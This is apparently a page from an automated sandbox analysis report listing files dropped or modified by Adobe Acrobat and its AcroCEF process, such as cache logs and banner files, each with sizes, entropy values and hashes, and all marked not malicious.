SHA-512: | D08580F992DE31C14CC3CA07332FF2EE14FFBFEC7FC413DF1EAE3BCE4191868273C5BAB5874CD350401997090E6879E3C8F63D70880D36B2C840D003157EBF33 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.189026239614044 |
Encrypted: | false |
SSDEEP: | 6:iOl4Rm1yq2P92nKuAl9OmbnIFUtHSyz1ZmwpSylRkwO92nKuAl9OmbjLJ:72Rgyv4HAahFUtXZ/llR5LHAaSJ |
MD5: | AA39B2D4E9D863C1DE53C90B2BED4396 |
SHA1: | EAB05161C07086F0D11CB96D0F637B594A415A15 |
SHA-256: | 35215A0B534DBEDE9C88C3ADC6984B18C693F2638832613C9920F6A05901F4BA |
SHA-512: | 98B02EC52B05C2A4AE5434B1CF2FCEEF14D65A26C8721B93B6A92003EDAB52C162AA1116C46B206D056EE9D28E537979E0BE4DE1993809950E08496609A781CD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.189026239614044 |
Encrypted: | false |
SSDEEP: | 6:iOl4Rm1yq2P92nKuAl9OmbnIFUtHSyz1ZmwpSylRkwO92nKuAl9OmbjLJ:72Rgyv4HAahFUtXZ/llR5LHAaSJ |
MD5: | AA39B2D4E9D863C1DE53C90B2BED4396 |
SHA1: | EAB05161C07086F0D11CB96D0F637B594A415A15 |
SHA-256: | 35215A0B534DBEDE9C88C3ADC6984B18C693F2638832613C9920F6A05901F4BA |
SHA-512: | 98B02EC52B05C2A4AE5434B1CF2FCEEF14D65A26C8721B93B6A92003EDAB52C162AA1116C46B206D056EE9D28E537979E0BE4DE1993809950E08496609A781CD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338 |
Entropy (8bit): | 5.197226195684371 |
Encrypted: | false |
SSDEEP: | 6:iOlqFRN+q2P92nKuAl9Ombzo2jMGIFUtHhZmwpzVkwO92nKuAl9Ombzo2jMmLJ:7M7Iv4HAa8uFUtB/f5LHAa8RJ |
MD5: | CCBE194143DAE582B55A7C36DDECB94A |
SHA1: | 6A140E1D7EBE89E5752C1B3066282638EACEECFF |
SHA-256: | BA3350B5F06540FA4BD8FC9237901ACDC06E580E2A527E307F3F45DD48229B64 |
SHA-512: | FD658BBB843E4A1FBD73835284B2CB907D158F536241F018F53C76BE1757002EC9E8B1359324E5F3CE2BE37BE5E7078206637193FBF3127A3AEB2E8A3618328C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338 |
Entropy (8bit): | 5.197226195684371 |
Encrypted: | false |
SSDEEP: | 6:iOlqFRN+q2P92nKuAl9Ombzo2jMGIFUtHhZmwpzVkwO92nKuAl9Ombzo2jMmLJ:7M7Iv4HAa8uFUtB/f5LHAa8RJ |
MD5: | CCBE194143DAE582B55A7C36DDECB94A |
SHA1: | 6A140E1D7EBE89E5752C1B3066282638EACEECFF |
SHA-256: | BA3350B5F06540FA4BD8FC9237901ACDC06E580E2A527E307F3F45DD48229B64 |
SHA-512: | FD658BBB843E4A1FBD73835284B2CB907D158F536241F018F53C76BE1757002EC9E8B1359324E5F3CE2BE37BE5E7078206637193FBF3127A3AEB2E8A3618328C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 508 |
Entropy (8bit): | 5.04987420573367 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqyosBdOg2Hmcaq3QYiubxnP7E4T3OF+:Y2sRdsf9dMHZ3QYhbxP7nbI+ |
MD5: | E572D7B8EFD9B38B8FA76B00336530A0 |
SHA1: | C491CCAB06E31C9F5DA1952DDECF35C838376993 |
SHA-256: | F95A3664E07BC8771072181038F76D7686E89F6E4EE6F14F64489173E0FB40C4 |
SHA-512: | 9BBF23E2AF0090456F99467B37C745DA521F18663B70CB23056144B124FD99050A8982A8FC8F791A12FFB029803A986A9135E16BF1248D773A43BF63A6918EA4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\df6cf379-4f5e-4240-88c0-3ccb61e7f0b3.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 508 |
Entropy (8bit): | 5.04987420573367 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqyosBdOg2Hmcaq3QYiubxnP7E4T3OF+:Y2sRdsf9dMHZ3QYhbxP7nbI+ |
MD5: | E572D7B8EFD9B38B8FA76B00336530A0 |
SHA1: | C491CCAB06E31C9F5DA1952DDECF35C838376993 |
SHA-256: | F95A3664E07BC8771072181038F76D7686E89F6E4EE6F14F64489173E0FB40C4 |
SHA-512: | 9BBF23E2AF0090456F99467B37C745DA521F18663B70CB23056144B124FD99050A8982A8FC8F791A12FFB029803A986A9135E16BF1248D773A43BF63A6918EA4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.240774342014828 |
Encrypted: | false |
SSDEEP: | 96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUf7TKrp5U:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLs |
MD5: | B694C61B4468FEAF4C8929BE64E02663 |
SHA1: | E9D5CE2D41CB042546D43AB06C35ABD72622CDFE |
SHA-256: | 18847E6E78B21005CE4FBE8A3A2EBD5217D907728778D4E1F16F40EC16355D69 |
SHA-512: | 1CEBFF39AAE485790FCD6890CC9F3248ED1C12C79BC6635C09427A498E76ABDD8CE61502F7A613DE1781DC598A3D4934D7EB3CA1DF44181BA2A3B0FF4F84414D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 5.192977217046182 |
Encrypted: | false |
SSDEEP: | 6:iOl5N+q2P92nKuAl9OmbzNMxIFUtH4Zmwp3kVkwO92nKuAl9OmbzNMFLJ:7Iv4HAa8jFUtY/O5LHAa84J |
MD5: | 5CE3E5343FB67BFAA254A2D2D61A9B1D |
SHA1: | F47E5A6C9BF01D1255B50EE0D5AA1A1B4CC76C66 |
SHA-256: | 54C390E1F4894DDE3DCC0CA17C555EBC8DB6E225ED01F0B557EBF13F17575518 |
SHA-512: | 79FAC39805EC1AF38A144C37DB6BCC8A118D606B16562418B627328974625BB5F152834ED124639AE25696700A54438764E0E97CDFC9584043A6074D13F23443 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 5.192977217046182 |
Encrypted: | false |
SSDEEP: | 6:iOl5N+q2P92nKuAl9OmbzNMxIFUtH4Zmwp3kVkwO92nKuAl9OmbzNMFLJ:7Iv4HAa8jFUtY/O5LHAa84J |
MD5: | 5CE3E5343FB67BFAA254A2D2D61A9B1D |
SHA1: | F47E5A6C9BF01D1255B50EE0D5AA1A1B4CC76C66 |
SHA-256: | 54C390E1F4894DDE3DCC0CA17C555EBC8DB6E225ED01F0B557EBF13F17575518 |
SHA-512: | 79FAC39805EC1AF38A144C37DB6BCC8A118D606B16562418B627328974625BB5F152834ED124639AE25696700A54438764E0E97CDFC9584043A6074D13F23443 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 57344 |
Entropy (8bit): | 3.293479095391318 |
Encrypted: | false |
SSDEEP: | 192:PedRBPVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:PeRci5H5FY+EUUUTTcHqFzqFP |
MD5: | D61F753F928909004994FC32FEF3E517 |
SHA1: | 28465E7A27BA548D85D17CDA05D5D6AB41AA93FE |
SHA-256: | E2EC3360EDA029642AF7AF7773CC0A0F45660FB96F33B43D8DEBD1FD7C02004D |
SHA-512: | C749B5AC5D250F699C2E324894F4081D34E5B99161404B923A10224190D286166404EA4BA8AADE91A6480D9B04B746E377B0818930915DEC5EFA34993393FB00 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.21262433025743 |
Encrypted: | false |
SSDEEP: | 24:7+tgEWwK7qLKzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mze:7Mgr7qOmFTIF3XmHjBoGGR+jMz+Lh/ |
MD5: | 75943A94AE580E125FA8E29DF893AFED |
SHA1: | 754A0E76ED76CA18B52E7FF3BE0962B9786FEFEF |
SHA-256: | 667D7D5DEB876010E403066940453D6C3EABA93B720F67EF0CA5DDA818A3602F |
SHA-512: | DE2B8845DE67F0A4F329D6BE6DD505F0AAE29CCCEF9BED584B72D450B2FD76B904EE65408F4525E3F936FFDB75E796C1C1630BC205CB2A0E31074B4AE155F8C4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7564456778558664 |
Encrypted: | false |
SSDEEP: | 3:kkFkle0RpttfllXlE/HT8k9FltNNX8RolJuRdxLlGB9lQRYwpDdt:kKHqeT80FlTNMa8RdWBwRd |
MD5: | F16AC6603F1B2BC4D464E7513B123F85 |
SHA1: | 7B648E9BFAD20C46383E001FD1E54D6E440AA919 |
SHA-256: | 25DC24290A9D5973FA61C8B9EDBB95C3F53A7EAA290922EF7EB2FBEFACAD4E3F |
SHA-512: | 770B8B88746D08C268F08F4E9F12B5072A6D59BEA2AE7AA231C76EBBE1AB006F776010ACFD866861F4E4B3C2580140802B4A76738303B3685C043F589807C7BC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3321883139188335 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJM3g98kUwPeUkwRe9:YvXKXBVKxYpW7RH5GMbLUkee9 |
MD5: | 15D9117B3F4F7D42A2373A7175536950 |
SHA1: | 2F5B3DBF7C6DF7AA6FA1CDCB300FABF934CC1DFF |
SHA-256: | 9E84536396EA04C77DCE4550C71ED0BCB5EE3B9789F928C1780800BAF510557F |
SHA-512: | E1E4F48EACCD277A6DAEC2D1C6BE807160FDBD293F85FCC8A567B18B014E57C9C28E66DB2EB42032F5055D75A8EBEC572437DC14A99BFC6264E09C622FF0BB7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.265890878048189 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfBoTfXpnrPeUkwRe9:YvXKXBVKxYpW7RH5GWTfXcUkee9 |
MD5: | 8F1192C25F3A755DE06E4E4304B538DE |
SHA1: | 1B2707BC1053EF0D4094E859ADECB6B78B1ACA83 |
SHA-256: | 1B87663546A031DF100B1F933345C8CEF1E601C8AEB6D461CC9A555D774C7718 |
SHA-512: | 252C3832D6F2011E5004146B558FCC5D1D52CE4C4D33B720143B6280F37002F27C75C3E5E77752B15E315013443747212CA2A3B5FB99639C2DBACDB3D3A71187 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.245896280813879 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfBD2G6UpnrPeUkwRe9:YvXKXBVKxYpW7RH5GR22cUkee9 |
MD5: | 4DB614962259EE341AA2E7F728B62057 |
SHA1: | 04632E82402CD5796247140CEF1C2195CA8D3ED2 |
SHA-256: | 3356153951044A13746778C0EF4AD612AA6B3BEE66DFD2AA8325AE57E167ECF7 |
SHA-512: | FCC2E9A373786E60B1B94DDBD88B5AE459A980BE40EBFC61F537E470B9F61DD5483BDBC58BB613EDFD92C7517E2EB7156B62901607AF08F3A4C787A12E72B9C4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.309987329383352 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfPmwrPeUkwRe9:YvXKXBVKxYpW7RH5GH56Ukee9 |
MD5: | 7DD77D5FF486004C685D058A9C006289 |
SHA1: | 522590CF46E9E2EB2550AB02A831D1263069270B |
SHA-256: | 5DB7DDDB3F3BBE9A3CF201E7DD30F0D4595C8D45EFB0D45CBCEF51F2CC646983 |
SHA-512: | 5A4C0ED1937C127F9D125AF7D50D858016E0A8EC014F3A7BD3EF93A5A20A8D969E32BA5074D74EF4C3724B7EA97D93E9ADCE2638A482EBB2A1EFA5102EBC34B3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.684481736640357 |
Encrypted: | false |
SSDEEP: | 24:Yv6X/Kii0pLgE9cQx8LennAvzBvkn0RCmK8czOCCSpn:YvSKN0hgy6SAFv5Ah8cv/p |
MD5: | 82302D4176F5FCCE84C7DDC4BC65FEDD |
SHA1: | 5B1A66CC4BB791B8B1C7F57F350F199A7EB77D7C |
SHA-256: | 1A4ABDC18FD007A92630CF260C69098825E0953505A2250806F94D8A919EE018 |
SHA-512: | DB123668A4CFF4F5F663273E151EDC57987FCB7F4D50464F2D46D1E0B0CF63C66D5B98DEAB5C3508F6EC272CE9FAD946A3528C16F8948D9DC04E255DB9C75652 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.254431813493967 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJf8dPeUkwRe9:YvXKXBVKxYpW7RH5GU8Ukee9 |
MD5: | E56EA8560B879956922BBEF4EC664434 |
SHA1: | EDE3ACA54BA77FE77182C7862E9E043E32246505 |
SHA-256: | AA624985080FD77E237B8D72B5D8D3BB8E39FAD58151725C3CB6D461467CFB4B |
SHA-512: | A4DF7F96FABE0AC720A0E53D183A92850D3DD3ABF35BC84160A8B48411EA9AEC59B5F90AFC16BE440C9897474B8F01608176915B11114B9F5894D4318FBA14D5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.254856091516535 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfQ1rPeUkwRe9:YvXKXBVKxYpW7RH5GY16Ukee9 |
MD5: | 9F35953786A818E87B45E8E7AA8EA659 |
SHA1: | 4BCB14A0F3F78F00AA31791952AB16F2185A1B49 |
SHA-256: | 0EDD5F9C25258F810D0D145E3619E1F95296A8B8951DB1AEA79E16426441D514 |
SHA-512: | 5778314628A9C9276B5E16026816C1423E4B8CC752D86D475F509D22467F3D258D0AD060BFE3FC032168E3B56F30DF55D3A366774A7F077E552E05DDFACFA989 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.276715347117166 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfFldPeUkwRe9:YvXKXBVKxYpW7RH5Gz8Ukee9 |
MD5: | 47EBFB4804B39DB7960618BA8359FDD6 |
SHA1: | FE96B89400939E9ADA228322D5DD91DC4AF573E7 |
SHA-256: | AB3DF85FC07247EB3CCFA1788CF41395352B41D82D36D09D7308FB1CD2AB65BE |
SHA-512: | 025D27A6EEA80751FDEADD54CEE631B2BC966335875CCFEBE1741819C033967276A6B1D7401DF2FDDE2B683A0CE269C5610C1978744B66605941F5D9E2C4EECF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.281028248540869 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfzdPeUkwRe9:YvXKXBVKxYpW7RH5Gb8Ukee9 |
MD5: | 447C4A7D6CB7B411886C0B59C028B5D4 |
SHA1: | A85C7EB60CF3FA013C23CC79FA70A575573BFCE5 |
SHA-256: | 39FB3C8E2CBBC92398EEA1A5311CBC63823E2211C9529F793E7DC30EFF6F833F |
SHA-512: | 1E6A9F4EB78F01FA5D7977A36027DEB51D52D82895678D4659E2464E222FA7ACB16F72F05E2E00F7D7A389F5ED808C55DA5FDD1B3ADA9BAAE3E4865BC530B94F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.260876101230588 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfYdPeUkwRe9:YvXKXBVKxYpW7RH5Gg8Ukee9 |
MD5: | 5CECB2A82725F14185055921A77E1401 |
SHA1: | 16C273F35846A9C0B0D62A380605B5C8DA2E7B25 |
SHA-256: | F99222D6D5F6E684DF6514114A26989DB719D911E0E22BB7C2979B5377C9071E |
SHA-512: | 91C5A74D6AD64FF251AE436EDB82A74D6A6B16425A308BB1A55E39E108159876624497CC731AC37480E9CF121E2AE2FAA5C7E87E74BD37206EFDA81E92336757 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.2475826076329115 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJf+dPeUkwRe9:YvXKXBVKxYpW7RH5G28Ukee9 |
MD5: | 9AB703A92F4D69391B5CA71424049B65 |
SHA1: | 85B29F279EDF5F8057707C057618B9C46B2B562E |
SHA-256: | 20EAFFE9C59C3A7BFC806620993E60D112F969F88C8D2F4E9FE4F5339E53022E |
SHA-512: | E7E9EF894BA18783A2430102974C3D177A1E7AB3E4D1BFCCC449365AA678359625C1AE49C237833751B73F2C63C6AE3FBCD0793363448D3AC56ED59F624724ED |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.244692091679498 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfbPtdPeUkwRe9:YvXKXBVKxYpW7RH5GDV8Ukee9 |
MD5: | B04FD4D6BF7DB0E1CCDA0561C05C4492 |
SHA1: | F7986DE9CF3BE3F5B10D525A693FAA68B49FAB26 |
SHA-256: | 5BBB451443CE3D02ECAA82CDCCEA331B23FEC02A95A43A0892DE31BCB965C0E8 |
SHA-512: | 6F9F104A108824FB883837DCD48DD28ED83CD85BFC76AB25F445861D40993ADBBDEBC8AAEE01CCADBC398A98B0FACFDA7D57004D8EC7B81C4ED8B19240759B36 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.2458237777782655 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJf21rPeUkwRe9:YvXKXBVKxYpW7RH5G+16Ukee9 |
MD5: | 2AA68D4EE4595F20AD5F88B1E95D732D |
SHA1: | 10A2A5F9ABB4770C64547B591208793A70D9EBE2 |
SHA-256: | 374B24804B078690D2FF04513B34DB13CEB4E44E7E0383E5530668406925005C |
SHA-512: | 391835459A526F097CC1760261F9758F6BD9C5A0C938FE00CB7A21005FBACE1FABE6BBCD08023DCD2477D10532BEA1BC3A4AAC782821D91BEFB4E3B6644A9C84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.657230790916024 |
Encrypted: | false |
SSDEEP: | 24:Yv6X/KiiwamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSpn:YvSKN2BgkDMUJUAh8cvMp |
